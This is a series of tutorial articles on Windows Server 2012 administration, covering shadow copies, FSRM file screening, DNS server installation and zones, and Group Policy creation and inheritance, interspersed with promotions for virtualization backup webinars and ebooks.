Next, you can either go with the default schedule of two snapshots of shadow copies every day, or define your own by clicking on Schedule to open the Schedule dialog:

windows-2012-shadow-copy-setup-generate-file-folder-11

Figure 11. Configuring the Shadow Copy Schedule

In the Schedule dialog, tweak the settings to fit your environment in the best possible way and click on Ok to return to the Shadow Copies dialog.

To create a current snapshot, click on Create Now and under Shadow Copies of Selected Volume, a date and time entry will appear, signifying that the server has created a shadow copy snapshot. Click on Ok to close the dialog.

Accessing Shadow Copies

Users can access the shared volume/folders from either their local server or from a client PC over the network. They can see the previous versions (shadow copies) of their folders and files from the Properties of the shared folder or file.

Go to File explorer and click on a shared volume - volume C:\ in our case. Select the shared folder within the shared volume – which, in our example, is C:\Users\Chris_Partsenidis. Right-click on the shared folder and go to Restore previous versions:

windows-2012-shadow-copy-setup-generate-file-folder-12

Figure 12. Viewing the Shadow Copy status of our shared folder

This opens the Properties dialog for the share folder - C:\Users\Chris_Partsenidis. The list under Folder versions has all the shadow copies created for the share folder – C:\Users\Chris_Partsenidis. From this list, you can select a specific previous version (shadow copy) and choose to Open, Copy or Restore it.

windows-2012-shadow-copy-setup-generate-file-folder-13

Figure 13. Accessing previous versions of our shared folder

After you have completed your work, click on Ok or Cancel to exit the dialog box.

This article explained the purpose Windows Shadow Copy services, how to enable and configure Shadow Copy for a Windows Volume. We also saw how administrators and users can access previous versions of folders/files that are located in a shadow-copy enabled volume.

  • Hits: 33108

Windows Server 2012 File Server Resources Manager (FSRM) Installation & Configuration - Block Saving Of Specific File Types on Windows Server

The Windows Server 2008 first carried FSRM or Fie Server Resources Manager, which allowed administrators to define the file types that users could save to file servers. Windows FSRM has been a part of all succeeding Windows Servers, and administrators can now block defined file types from being uploaded to a specific folder or to an entire volume on the server.

Before you can begin blocking file extensions, you may need to install and configure FSRM on your Windows Server 2012 R2. Installation of FSRM can be achieved through the Server Manager GUI or by using the PowerShell console.

This article will examine the installation of FSRM using both methods, Server Manager GUI and Windows Server PowerShell console, while providing all necessary information to ensure a successful deployment and configuration of FSRM services.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Installing FSRM On Server 2012 Using The Server Manager GUI

Assuming you are logged in as the administrator, start with the Server Manager – click on the second icon from left on the bottom toolbar on the desktop as shown below:

windows-2012-fsrm-installation-configuration-block-defined-file-types-1

Figure 1. Launching the Server Manager Dashboard

This brings up the Server Manager Dashboard. Proceed to the top right hand corner and click on Manage, then click on Add Roles and Features.

windows-2012-fsrm-installation-configuration-block-defined-file-types-2
Figure 2. Opening Add Roles and Features console

This opens the Add Roles and Features Wizard, where you need to click on Server Selection. Depending on how many servers you are currently managing, the right hand side will show one or multiple servers in the pool. Select the file server on which you want to install FSRM, and click on Next to proceed.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-3

Figure 3. Selecting a Server to add the FSRM role

The next screen shows the server roles that you can install on the selected server. On the right hand side, locate File and Storage Services and expand it. Locate the File and iSCSI services and expand it. Now, locate the File Server Resource Manager entry.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-4
Figure 4. Selecting the File Server Resource Manager role for installation

Click on the check box in front of the entry File Server Resource Manager. This will open up the confirmation dialog box for the additional features that you must first install before installing FSRM.

windows-2012-fsrm-installation-configuration-block-defined-file-types-5 
Figure 5. Confirming the installation of additional role services required for FSRM

Click on Add Features and you are all set to install FSRM, as the check box for File Server Resource Manager now has a tick mark (shown below).

windows-2012-fsrm-installation-configuration-block-defined-file-types-6

Figure 6. Back to the Server Role installation – Confirming FSRM Role Selection

Clicking on Next allows you to Select one or more features to install on the selected server. We don’t need to add anything here at this stage, so click Next to go to the next step.

This brings up a screen asking you to Confirm installation selections. This is the stage where you have the last chance to go back and make any changes, before the actual installation starts.

windows-2012-fsrm-installation-configuration-block-defined-file-types-7 
Figure 7. Confirm installation selections

Click on Install to allow the installation to commence and show the progress on the progress bar on the Results screen. Once completed, you can see the Installation successful on … under the progress bar.

windows-2012-fsrm-installation-configuration-block-defined-file-types-8 
Figure 8. Completion of FSRM role installation

Click on Close to exit the process.

To check if the FSRM has actually started running, go to the Server Manager Dashboard and click on File and Storage Services on the left hand side of the screen.

windows-2012-fsrm-installation-configuration-block-defined-file-types-9 
Figure 9. Server Manager Dashboard

The Dashboard now shows all the servers running under the File and Storage Services. Go down to Services and you will see FSRM running with an automatic start up.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-10

Figure 10. File and Storage Services – Confirming FSRM Service

Installing FSRM On Server 2012 Using The PowerShell Console

This is a comparatively easier and faster process compared to the GUI method.

To invoke the PowerShell, click the third icon from left on the bottom toolbar on the desktop.

windows-2012-fsrm-installation-configuration-block-defined-file-types-11 
Figure 11. Launching Windows PowerShell

 This will open up a console with an administrative level command prompt. At the command prompt, type:

C:\Users\Administrator> Add-WindowsFeature –Name FS-Resource-Manager –IncludeManagementTools

windows-2012-fsrm-installation-configuration-block-defined-file-types-12

Figure 12.  Executing PowerShell command to install FSRM

A successful installation will be indicated as True , under the Success column as shown above.

FREE Hyper-V & VMware Backup:  Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Configuring File Screening

Invoke FSRM from the Tools menu on the top right hand corner of the Server Manager Dashboard.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-13

Figure 13. Running the File Server Resource Manager component

The File Server Resource Manager screen opens up. On the left panel, expand the File Screening Management and go to File Groups. The central panel shows the File Groups, the Include Files and the Exclude Files in three columns.

Under the column File Groups, you will find file types conveniently grouped together. The column Include Files lists all file extensions that are included in the specific file group. For a new server, the column Exclude Files is typically empty.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-14

Figure 14 – File Groups, Include File and Exclude Files

On the left panel, go to File Screen Templates and click on it. The central panel shows predefined rules that apply to folders or volumes.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-15

Figure 15. File Server Resource Manager - File Screen Templates

For instance, double-click on Block Image Files in the central panel. This opens up the File Screen Template Properties for Block Image Files. Here you can define all the actions that the server will take when it encounters a situation where a user is trying to save a file belonging to the excluded group.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-16

Figure 16. FSRM - File Screen Template Properties for Block Image Files

You can choose to screen the specified file type either actively or passively. Active screening disallows users from saving the specified file group. With passive screening, users are not prevented from saving the files while the administrator can monitor their actions.

The server can send from one to four basic alerts when it encounters an attempt to save a forbidden file. The server can send an Email message to the administrator, create an entry in the Event Log, run a specified Command or Script and or generate a Report. You can set up the details for each action on individual tabs. When completed, exit by clicking on OK or Cancel.

To edit the existing template or to create a new one based on the chosen template, go to the File Screen Templates and in the central panel, right-click on the predefined template you would like to edit. From the Actions menu on the right panel, you can either Create File Screen Template or Edit Template Properties.

windows-2012-fsrm-installation-configuration-block-defined-file-types-17 
Figure 17. FSRM – Creating or editing a File Screen Template

Clicking on Create File Screen Template opens up a dialog where you can click on Browse to select a folder or volume on which the new rule would be applied. Under How do you want to configure file screen properties? You can either Derive or Create the file screen properties. Click on Create to allow the new file screen rule to appear in the central panel.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-18

Figure 18. FSRM - Creating a File Screen

Creating Exceptions

Exceptions are useful when you want to allow a blocked file type to be saved in a specific location. Go to the left panel of the FSRM screen and right-click on File Screens.

windows-2012-fsrm-installation-configuration-block-defined-file-types-19

Figure 19. FSRM – Creating a File Screen Exception

From the menu on the right panel, click on Create File Screen Exception. On the menu that opens up, click on Browse to select a folder or volume on which the new rule would be applied and select the group you would like to exclude under the File groups. Click OK and complete the process.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-20

Figure 20. FSRM – File Screen Exception settings and options

Summary

This article showed how to we can use Windows Server File Server Resources Manager (FSRM) to block file types and extensions from being uploaded or saved to a directory or volume on a  Windows 2012 R2 server.  We explained how to perform installation of FSRM via GUI interface and Powershell, and covered the creation or editing of File Screen Templates used to block or permit access for specific files.

  • Hits: 22110

New Upcoming Features in Hyper-V vNext - Free Training From Leading Hyper-V Experts – Limited Seats!

With the release of Hyper-V vNext just around the corner, Altaro has organized a Free webinar that will take you right into the new Hyper-V vNext release. Microsoft Hyper-V MVP, Aidan Finn and Microsoft Sr. Technical Evangelist Rick Claus will take you through the new features, improvements, changes and much more, and will be available to answer any questions you might have.

Don't lose this opportunity to stay ahead of the rest, learn about the new Hyper-V vNext features and have your questions answered by Microsoft Hyper-V experts!

Note: This Webinar date has passed, however the recording and all material presented are freely available by visiting the provided registration line below:

Click here to view this Free Webinar.

windows-virtualization-hyper-v-vnext-features-webinar-1

  • Hits: 10088

Free Webinar & eBook on Microsoft Licensing for Virtual Environments (Hyper-V)

hyper-v-altaro-free-webinar-ebook-1Microsoft Licensing for Virtual environments can become a very complicated topic, especially with all the misconceptions and false information out there. Thankfully Altaro, the leader in Hyper-V Backup solutions, has gathered Hyper-V MVP experts Thomas Maurer and Andrew Syrewicze to walk us through the theory and present us with real licensing scenarios to help us gain a solid understanding of Microsoft licensing in virtual environments.

Their Hyper-V experts will also be available to answer all questions presented during the free webinar.  Registration and participation for this webinar is complete free.

Webinar Details: This webinar has passed however a recorded version is available at the below url along with all necessary resources.

As a bonus, a free eBook written by Hyper-V expert Eric Siron, covering Licensing Microsoft Server in a Virtual Environment, is now available as a free download.

To download your free eBook copy and register for the Free Webinar click here.

 

  • Hits: 12128

Free Hyper-V eBook - Create, Manage and Troubleshoot Your Hyper-V VMs. Free PowerShell Scripts Included!

hyper-v-altaro-cookbook-1With the introduction of Hyper-V on the Windows Server platform, virtualization has quickly become the de facto standard for all companies seeking to consolidate their server infrastructure. While we've covered a number of virtualization topics, including Hyper-V installation, Management-Configuration, Hyper-V Backups, Best Practices and much more, this e-Book offered by Altaro is all about getting the most out of your Hyper-V infrastructure.

The Altaro PowerShell Hyper-V Cookbook has been written by Jeffery Hicks - a well known PowerShell MVP, covers a number of very important topics that are guaranteed to help you discover more about your Hyper-V server(s) and help you make the most out of what they can offer.

Topics covered include:

  • Hyper-V Cmdlets - Understand what they are, how to use them and create a Hyper-V virtual machine
  • Discover and display information about your VMs and Hyper-V host
  • Easily Identify VHD/VHDX files
  • Mount ISO files
  • Delete obsolete snapshots and query Hyper-V event logs
  • and much more!

 Don't miss this opportunity and grab your free copy for a limited time!

 BONUS: All PowerShell scripts are included FREE in a separate ZIP file!

  • Hits: 13639

How to Install and Configure Windows 2012 DNS Server Role

Our previous article covered introduction to the Domain Name System (DNS) and explained the importance of the DNS Server role within the network infrastructure, especially when Active Directory is involved. This article will cover the installation of the DNS server role in Windows 2012 Server and will include all necessary information for the successful deployment and configuration of the DNS service. Users interested can also read our DNS articles covering the Linux operating system or analysis of the DNS Protocol under our Network Protocols section.

The DNS Server can be installed during the deployment of Active Directory Services or as a stand-alone service on any Windows server. We'll be covering both options in this article.

FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

DNS Server Installation via Active Directory Services Deployment

Administrators who are in the process deploying Active Directory Services will be prompted to install the DNS server role during the AD installation process, as shown in the figure 1 below:

windows-2012-dns-server-installation-configuration-1Figure 1. DNS Installation via Active Directory Services Deployment

Alternatively Administrators can select to install DNS server role later on or even on a different server, as shown next. We decided to install the DNS Server role on the Active Directory Domain Controller Server.

DNS Server Installation on Domain Controller or Stand Alone Server

To begin the installation, open Server Manger and click Add Roles and Features. Click Next on Before you begin page. Now choose Role-based or feature-based installation and click Next:

Figure 2. Selecting Role-based or feature-based installation

In the next screen, choose the Select a server from this server pool option and select the server for which the DNS server role is intended. Once selected, click the Next button as shown in figure 3:

windows-2012-dns-server-installation-configuration-3Figure 3. Selecting the Server that will host the DNS server role

 The next screen allows us to choose the role(s) that will be installed. Select the DNS server role from the list and click Next to continue:

windows-2012-dns-server-installation-configuration-4 Figure 4. Selecting the DNS Server Role for installation

The next screen is the Features page, where you can safely click Next without selecting any feature from the list.

The next screen provides information on the DNS Server role that's about to be installed. Read the DNS Server information and click Next:

windows-2012-dns-server-installation-configuration-5Figure 5. DNS Information

The final screen is a confirmation of roles and services to be installed. When ready, click on the Install button to for the installation to begin:

windows-2012-dns-server-installation-configuration-6Figure 6. Confirm Installation Selections

The Wizard will provide an update on the installation progress as shown below. Once the installation has completed, click the Close button:

windows-2012-dns-server-installation-configuration-7Figure 7. Installation Progress

 

FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Configuring Properties of DNS Server

Upon the successful installation of the DNS server role, you can open the DNS Manager to configure the DNS Server. Once DNS Manager is open, expand the server, in our example the server is FW-DC1. Right below the server we can see the Forward Lookup Zones and Reverse Lookup Zones listed. Because this is an Active Directory Integrated DNS server there is a firewall.local and _msdcs.firewall.local zone installed by default, as shown in figure 8:

windows-2012-dns-server-installation-configuration-8Figure 8. DNS Manager & DNS Zones

To configure the DNS server properties, right-click the DNS server and click properties. Next, select the Forwarders tab. Click Edit and add the IP address of DNS server that this server will query if it is unable to resolve the IP address of the listed domains. This is usually the ISP's DNS server or any public DNS server such as Google (e.g 8.8.8.8, 4.2.2.2). There is another feature called root hints which also does similar job (queries the Root DNS servers of the Internet) but we prefer using forwarders alongside with public DNS servers:

windows-2012-dns-server-installation-configuration-9Figure 9. DNS Forwarders – Add your ISP or Public DNS Servers here

Next, click on the Advanced tab. Here you can configure advanced features such as round robin (in case of multiple DNS servers), scavenging period and so on. Scavenging is a feature often used as it deletes the stale or inactive DNS records after the configured period, set to 7 days in our example:

windows-2012-dns-server-installation-configuration-10 Figure 10. Advanced Options - Scavenging

Next up is the Root Hints tab. Here, you will see list of 13 Root Servers. These servers are used when our DNS server is unable to resolve DNS requests for its clients. The Root Servers are used when no DNS Forwarding is configured. As we can see, DNS forwarding is pretty much an optional but recommended configuration. It is highly unlikely administrators will ever need to change the Root Hints servers:

windows-2012-dns-server-installation-configuration-11Figure 11. Root Hints

Our next tab, Monitoring is also worth exploring. Here you can perform the DNS lookup test that will run queries against your newly installed DNS server. You can also configure automated test that will run at a configured time interval to ensure the DNS server is operating correctly:

windows-2012-dns-server-installation-configuration-12Figure 12. Monitoring Tab – Configuring Automated DNS Test Queries

Next, click on the Event Logging tab. Here you can configure options to log DNS events. By default, all events are logged. So you can configure to log only errors, warnings, combination of errors & warnings, or turn off logging (No events option):

windows-2012-dns-server-installation-configuration-13Figure 13. Event Logging

When Event Logging is enabled, you can view any type of logged events in the Event Viewer (Administrative Tools) console.

The Debug Logging tab is next up. Debug Logging allows us to capture to a log file any packets sent and received by the DNS server. Think of it as Wireshark for your DNS server. You can log DNS packets and filter them by direction, protocols, IP addresses, and other parameters as shown below. You can setup the log file location and set the maximum file size in bytes:

windows-2012-dns-server-installation-configuration-14Figure 14. Debug Logging – Capturing DNS Packets & Configuring DNS Debugging

Zone – Domain Properties

Each Zone or Domain has a specific set of properties which can be configured as shown in figure 15 below. In our example, firewall.local is an Active Directory-integrated zone as indicated by the Type field. Furthermore the zone's status is shown at the top area of the window – our zone is currently in the running state and can be paused by simply clicking on the pause button on the right:

windows-2012-dns-server-installation-configuration-15Figure 15. Zone Properties

Right below, you can change the zone type to primary, secondary or stub. You can also setup dynamic updates to be secure or not. Similarly, you can setup aging or scavenging properties to automate the cleanup of stale records.

The Start of Authority (SOA) tab provides access to a number of important settings for our DNS server. Here, you can configure the serial number increments automatically every time there is a change in the DNS zone. The serial number is used by other DNS servers to identify if any changes have been made since the last time they replicated the zone. The Primary server field indicates which server is primary server where the zone or domain is hosted. In case there are multiple DNS servers in the network, we can easily select a different server from here:

windows-2012-dns-server-installation-configuration-16Figure 16. Start Of Authority Settings

In addition, you can also configure the TTL (Time to Live) value, refresh, retry intervals and expiry time of the record.

Next is the Name Servers tab. In this tab, you can add list of name servers where this zone can be hosted:

windows-2012-dns-server-installation-configuration-17Figure 17. DNS Name Servers

Finally, the Zone Transfers tab. In this tab, you can add DNS servers which can copy zone information (zone transfer) from this DNS server:

windows-2012-dns-server-installation-configuration-18Figure 18. Zone Transfers

Once all configuration changes have been completed, click Apply and your zone is good to go.

FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

This article showed how to install and configure Windows 2012 DNS Server Role and explained all DNS Server options available for configuration.

  • Hits: 43569

Introduction to Windows DNS – The Importance of DNS for Active Directory Services

windows-2012-dns-active-directory-importance-1The Domain Name System (DNS) is perhaps one of the most important services for Active Directory. DNS provides name resolution services for Active Directory, resolving hostnames, URLs and Fully Qualified Domain Names (FQDN) into IP addresses. The DNS Service uses UDP port 53 and in some cases TCP port 53 - when UDP DNS requests fail consistently. (Double-Check for Windows)

In-Depth information and analysis of the DNS protocol structure can be found at our DNS Protocol Analysis article.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

How DNS Resolution Works

When installed on a Windows Server, DNS uses a database stored in Active Directory or in a file and contains lists of domain names and corresponding IP addresses. When a client requests a website by typing a domain (URL) inside the web browser, the very first thing the browser does is to resolve the domain to an IP address.

To resolve the IP address the browser checks into various places. At first, it checks the local cache of the computer, if there is no entry for the domain in question, it then checks the local hosts file (C:\windows\system32\drivers\etc\hosts), and if no record is found their either, it finally queries the DNS server.

The DNS server returns the IP address to the client and the browser forms the http request which is sent to the destination web server.

The above series of events describes a typical http request to a site on the Internet. The same series of events are usually followed when requesting access to resources within the local network and Active Directory, with the only difference that the local DNS server is aware of all internal hosts and domains.

A DNS Server can be configured in any server running Windows Server 2012 operating system. The DNS server can be Active Directory integrated or not. A few important tasks a DNS server in Windows Server 2012 is used for are:

  • Resolve host names to their corresponding IP address (DNS)
  • Resolve IP address to their corresponding host name (Reverse DNS)
  • Locate Global Catalog Servers and Domain Controllers
  • Locate Mail Servers

DNS Zones & Records

A DNS Server contains Forward Lookup Zone and Reverse Lookup Zone. Each zone contains different types of resource records. A Forward Lookup Zone maps host name to an IP address while Reverse Lookup Zone maps the IP address of the host name. The DNS Zone is stored in a file or in the Active Directory database. Only one copy of zone is writable and others are read-only if the zone is stored in Active Directory database. Resource records specify the type of resource.

Resource records in Forward Lookup Zone include:

Resource Type

Record

Host Name

A

Mail Exchange

MX

Service

SRV

Start of Authority

SOA

Alias

CNAME

 Name Server

 NS

Table 1. Resource Record Types

Similarly, resource records in Reverse Lookup Zone include:

Resource Type

Record

Pointer

PTR

Start of Authority

SOA

Name Server

NS

Table 2. Reverse Lookup Zone Resource Record Types

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Types Of DNS Zone

There are four DNS zone types:

Primary Zones: This is a Master DNS Server for a zone and stores the master copy of zone data in AD DS or in a local file. This zone is the primary source for information about this zone.

Secondary Zones: This is a Secondary DNS Server for a zone and stores read-only copy of zone data in a local file. Secondary Zones cannot be stored in AD DS. The server that hosts Secondary Zones, retrieves DNS information from another DNS server where the original zone is hosted and must have network access to the remote DNS server.

Stub Zones: A Stub Zone contains only those resource records that are required to identify the authoritative DNS servers of that zone. A Stub Zone contains only SOA, NS and A type resource records which are required to identify the authoritative name server.

Active Directory-Integrated Zones: An Active Directory-Integrated Zone stores zone data in Active Directory. The DNS server can use Active Directory replication model to replicate DNS changes between Domain Controllers. This allows for multiple writable Domain Controllers in the network. Similarly, secure dynamic updates are also supported, which means that computers that have joined to the domain can have their own DNS records in the DNS server.

This article provided information about DNS services and a brief description of the DNS resolution process. We also explained the importance of DNS Services in Active Directory and saw which are the four different type of DNS Zones. Next article will show how to install the DNS Server role in Windows Server 2012.

  • Hits: 39680

Windows Server Group Policy Link Enforcement, Inheritance and Block Inheritance

windows-2012-group-policy-enforcement-4Our previous article explained what Group Policy Objects (GPO) are and showed how group policies can be configured to help control computers and users within an Active Directory domain. This article takes a look at Group Policy Enforcement, Inheritance and Block Inheritance throughout our Active Directory structure. Users seeking more technical articles on Windows 2012 Server can visit our dedicated Windows 2012 Server section.

Group Policy Enforcement, Inheritance and Block Inheritance provide administrators with the necessary flexibility allowing the successful Group Policy deployment within Active Directory, especially in large organizations where multiple GPOs are applied at different levels within the Active Directory, causing some GPOs to accidently override others.

Thankfully Active Directory provides a simple way for granular control of GPOs:

 

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

 

Group Policy Object Inheritance

GPOs can be linked at Site, Domain, OUs and child OUs. By default, group policy settings that are linked to parent objects are inherited to the child objects in the active directory hierarchy. By default, Default Domain Policy is linked to the domain and is inherited to all the child objects of the domain hierarchy.

GPO inheritance let’s administrators to set common set of policies to the domain level or site level and configure more specific polices at the OU level. GPOs inherited from parent objects are processed before GPOs linked to the object itself.

 

As shown in the figure below, the Default Doman Policy GPO with precedence 2 will be processed first, because the Default Domain Policy is applied at the domain level (firewall.local) where as the WallPaper GPO is applied at the organization unit level:

windows-2012-group-policy-enforcement-1Figure 1. Group Policy Inheritance

Block Inheritance

As GPOs can be inherited by default, they can also be blocked, if required using the Block Inheritance. If the Block Inheritance setting is enabled, the inheritance of group policy setting is blocked. This setting is mostly used when the OU contains users or computers that require different settings than what is applied to the domain level.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

As shown in the figure below, to configure blocking of GPO inheritance, right-click the OU container and select the Block Inheritance option from the list:

         Figure 2. GPO Block Inheritance

Enforced (No Override)

This option prevents a GPO from being overridden by other GPO. For example, if you apply a GPO to domain and check the Enforced option, then this policy will be enforced to all the child objects in active directory and takes precedence of child GPO objects even if you have configured another similar GPO child object with a different value. In previous Windows Server versions, the GPO enforced option used to be called No Override.

To enable the GPO Enforced option, right-click on a particular GPO and click on the Enforced option:

windows-2012-group-policy-enforcement-3Figure 3. Enforcing a GPO

This article explained the importance of GPO inheritance and how it can be enforced or blocked via Group Policy Enforcement, Inheritance and Block Inheritance throughout the Active Directory. For more information on Group Policies and how they are created or applied, refer to our article Configuring Windows 2012 Active Directory Group Policies or visit our Windows 2012 Server Section.



  • Hits: 64282

Understanding, Creating, Configuring & Applying Windows Server 2012 Active Directory Group Policies

This article explains what Group Policies are and shows how to configure Windows Server 2012 Active Directory Group Policies. Our next article will cover how to properly enforce Group Policies (Group Policy Link Enforcement, Inheritance and Block Inheritance) on computers and users that a part of the company's Active Directory.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Before we dive into Group Policy configuration, let's explain what exactly Group Policies are and how they can help an administrator control its users and computers.

A Group Policy is a computer or user setting that can be configured by administrators to apply various computer specific or user specific registry settings to computers that have joined the domain (active directory). A simple example of a group policy is the user password expiration policy which forces users to change their password on a regular basis. Another example of a group policy would be the enforcement of a specific desktop background picture on every workstation or restricting users from accessing their Local Network Connection properties so they cannot change their IP address.

A Group Policy Object (GPO) contains one or more group policy settings that can be applied to domain computers, users, or both. GPO objects are stored in active directory. You can open and configure GPO objects by using the GPMC (Group Policy Management Console) in Windows Server 2012:

windows-2012-group-policies-1 Figure 1. GPO Objects

Group Policy Settings are the actual configuration settings that can be applied to a domain computer or user. Most of the settings have three states, Enabled, Disabled and Not Configured. Group Policy Management Editor provides access to hundreds of computer and user settings that can be applied to make many system changes to the desktop and server environment.

Group Policy Settings

Group Policy Settings are divided into Computer Settings and User Settings. Computer Settings are applied to computer when the system starts and this modifies the HKEY Local Machine hive of registry. User Settings are applied when the users log in to the computer and this modifies the HKEY Local Machine hive.

windows-2012-group-policies-2Figure 2. Group Policy Settings

Computer Settings and User Settings both have policies and preferences.

These policies are:

Software Settings: Software can be deployed to users or computer by the administrator. The software deployed to users will be available only to those specific users whereas software deployed to a computer will be available to any user that on the specific computer where the GPO is applied.

Windows Settings: Windows settings can be applied to a user or a computer in order to modify the windows environment. Examples are: password policies, firewall policy, account lockout policy, scripts and so on.  

Administrative Templates: Contains a number of user and computer settings that can be applied to control the windows environment of users or computers. For example, specifying the desktop wallpaper, disabling access to non-essential areas of the computers (e.g Network desktop icon, control panel etc), folder redirection and many more.

Preferences are a group policy extension that does the work which would otherwise require scripts. Preferences are used for both users and computers. You can use preferences to map network drives for users, map printers, configure internet options and more.

Next, let’s take a look at how we can create and apply a Group Policy.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Creating & Applying Group Policy Objects

By default, GPOs can be created and applied by Domain Admins, Enterprise Admins and Group Policy Creator Owner user groups. After creating the GPO, you can apply or link the GPOs to sites, domains or Organizational Units (OUs), however you cannot apply GPO to users, groups, or computers. GPOs are processed in following top to bottom order:

  1. Local Group Policy: Every windows operating system has local group policy installed by default. So this local group policy of the computer is applied at first.
  2. Site GPO: The GPOs linked to the Site is then processed. By default, there is no site level group policy configured.
  3. Domain GPO: Next, the GPO configured at domain level is processed. By default, GPO named default domain policy is applied at the domain level. This applies to all the objects of the domain. If there is policy conflict between domain and site level GPOs, then GPO applied to domain level takes the precedence.
  4. Organizational Unit GPO: - In the end, GPO configured at OU is applied. If there is any conflict between previously applied GPOs, the GPO applied to OU takes the most precedence over Domain, Site and Local Group Policy.

Let’s now take a look at a scenario to apply a group policy to domain joined computers to change the desktop background. We have a domain controller named FW-DC01 and two clients FW-CL1 and FW-CL2 as shown in the diagram below. The goal here is to set the desktop wallpaper for these two clients from a group policy:

windows-2012-group-policies-3Figure 3. GPO Scenario

In our earlier articles we showed how Windows 8 / Windows 8.1 join an Active Directory domain, FW-CL1 and FW-CL2 are workstations that have previously joined our domain – Active Directory. We have two users MJackson and PWall in the FW Users OU.

Open the Group Policy Management Console (GPMC) by going into Server Manager>Tools and select Group Policy Management as shown below:

windows-2012-group-policies-4Figure 4. Open GPMC

As the GPMC opens up, you will see the tree hierarchy of the domain. Now expand the domain, firewall.local in our case, and you will see the FW Users OU which is where our users reside. From here, right-click this OU and select the first option Create a GPO in this domain and Link it here:

windows-2012-group-policies-5Figure 5. Select FW Users and Create a GPO

Now type the Name for this GPO object and click the OK button. We selected WallPaper GPO:

windows-2012-group-policies-6Figure 6. Creating our Wallpaper Group Policy Object

Next, right-click the GPO object and click edit:

windows-2012-group-policies-7Figure 7. Editing a Group Policy Object

At this point we get to see and configure the policy that deals with the Desktop Wallpaper, however notice the number of different policies that allow us to configure and tweak various aspects of our domain users.

To find the Desktop Wallpaper, go to Expand User Configuration> Policies> Administrative Templates> Desktop> Desktop. At this point we should be able to see the setting in right window. Right-click the Desktop Wallpaper setting and select Edit:

windows-2012-group-policies-8Figure 8. Selecting and editing Desktop Wallpaper policy

The settings of Desktop Wallpaper will now open. First we need to activate the policy by selecting the Enabled option on the left. Next, type the UNC path of shared wallpaper. Remember that we must share the folder that contains the wallpaper \\FW-DC1\WallPaper\ and configure the share permission so that users can access it. Notice that we can even select to center our wallpaper (Wallpaper Style). When ready click Apply and then OK:

windows-2012-group-policies-9Figure 9. Configure Desktop Wallpaper

Now that we’ve configured our GPO, we need to apply it. To do so, we can simply log off and log back in the client computer or type following command in domain controller’s command prompt to apply the settings immediately:

C:\> gpupdate /force

Once our domain user logs in to their computer (FW-CL1), the new wallpaper policy will be applied and loaded on to the computer’s desktop.

windows-2012-group-policies-10Figure 10. User Login

As we can see below, our user's desktop now has the background image configured in the group policy we created:

windows-2012-group-policies-11Figure 11. Computer Desktop Wallpaper Changed

This example shows how one small configuration setting can be applied to all computers inside an organization. The power and flexibility of Group Policy Objects is truly unbelievable and as we’ve shown, it’s even easier to configure and apply them with just a few clicks on the domain controller!

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

This article explained what Group Policies Objects are and showed how to Configure Windows 2012 Active Directory Group Policies to control our Active Directory users and computers. We also highly recommend our article on Group Policy Enforcement, Inheritance throughout the Active Directory structure. More articles on Windows 2012 & Hyper-V can be found at our Windows 2012 Server section.

 

  • Hits: 47148

Installing Active Directory Services & Domain Controller via Windows PowerShell. Active Directory Concepts

This article serves as an Active Directory tutorial covering installation and setup of Windows 2012 Active Directory Services Role & Domain Controller using Windows 2012 PowerShell.

Our previous article covered the installation of Windows Server 2012 Active Directory Services role and Domain Controller installation using the Windows Server Manager (GUI) interface.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

What Is Active Directory?

Active Directory is a heart of Windows Server operating systems. Active Directory Domain Services (AD DS) is central repository of active directory objects like user accounts, computer accounts, groups, group policies and so on. Similarly, Active Directory authenticates user accounts and computer accounts when they login into the domain. Computers must be joined to the domain in order to authenticate Active Directory users.

Active Directory is a database that is made up of several components which are important for us to understand before attempting to install and configure Active Directory Services on Windows Server 2012. These components are:

  1. Domain Controller (DC): - Domain Controllers are servers where the Active Directory Domain Services role is installed. The DC stores copies of the Active Directory Database (NTDS.DIT) and SYSVOL (System Volume) folder.
  2. Data Store: - It is the actual file (NTDS.DIT) that stores the Active Directory information.
  3. Domain: - Active Directory Domain is a group of computers and user accounts that share common administration within a central Active Directory database.
  4. Forest: - Forest is a collection of Domains that share common Active Directory database. The first Domain in a Forest is called a Forest Root Domain.
  5. Tree: - A tree is a collection of domain names that share common root domain.
  6. Schema: - Schema defines the list of attributes and object types that all objects in the Active Directory database can have.
  7. Organizational Units (OUs): - OUs are simply container or folders in the Active Directory that stores other active directory objects such as user accounts, computer accounts and so on. OUs are also used to delegate control and apply group policies.
  8. Sites: - Sites are Active Directory object that represent physical locations. Sites are configured for proper replication of Active Directory database between sites.
  9. Partition: - Active Directory database file is made up of multiple partitions which are also called naming contexts. The Active Directory database consists of partitions such as application, schema, configuration, domain and global catalog.

Checking Active Directory Domain Services Role Availability 

